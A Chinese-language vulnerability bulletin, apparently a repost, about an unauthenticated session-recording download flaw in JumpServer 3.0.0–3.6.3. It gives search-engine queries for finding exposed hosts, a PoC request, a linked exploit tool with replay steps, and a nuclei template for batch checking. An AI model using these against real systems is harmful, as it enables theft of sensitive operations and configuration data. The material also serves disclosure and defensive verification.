【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链

admin 2024年4月23日06:56:21评论18 views字数 1193阅读3分58秒阅读模式

免责声明

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

产品简介

JumpServer 是广受欢迎的开源堡垒机,是符合 4A 规范的专业运维安全审计系统。JumpServer 帮助企业以更安全的方式管控和登录所有类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。

漏洞描述

JumpServer开源堡垒机的api/api/v1/terminal/sessions/路径存在未授权访问漏洞,攻击者无需身份验证即可下载会话录像文件重播。存储在 S3、OSS 或其他云存储中的会话重播不受影响。

影响版本

3.0.0 <= JumpServer <= 3.5.4
3.6.0 <= JumpServer <= 3.6.3

网络测绘

favicon图标特征

【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链

FOFA网络测绘搜索

app="JumpServer-堡垒机"

鹰图网络测绘搜索

app.name="JumpServer"

漏洞复现

根据POC尝试请求目标 http://127.0.0.1:8080/api/v1/terminal/sessions/

【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链

细节扩展

该漏洞可以导致堡垒机操作录像缓存文件任意下载的安全问题,这一步可以使用HolyGu师傅写的检测工具去判断是否存在未授权下载。

https://github.com/HolyGu/CVE-2023-42442

工具运行后录像文件会存放在同目录下,配合jumpserver官方的播放器即可回放录像,从而导致堡垒机各敏感操作、敏感配置信息的泄露,后果较为严重。

https://github.com/jumpserver/VideoPlayer
【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链

nuclei批量验证POC模板

id: JumpServer-unauthorized

info:
  name: JumpServer-unauthorized
  author: 4Zen
  severity: high
  tags: unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/terminal/sessions/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "id"
          - "user"
        condition: and

      - type: status
        status:
          - 200
【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链

修复方案

更新到最新版本或及时联系供应商获取加固修复方案。https://www.jumpserver.org/

原文始发于微信公众号(划水但不摆烂):【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月23日06:56:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链http://cn-sec.com/archives/2086136.html

发表评论

匿名网友 填写信息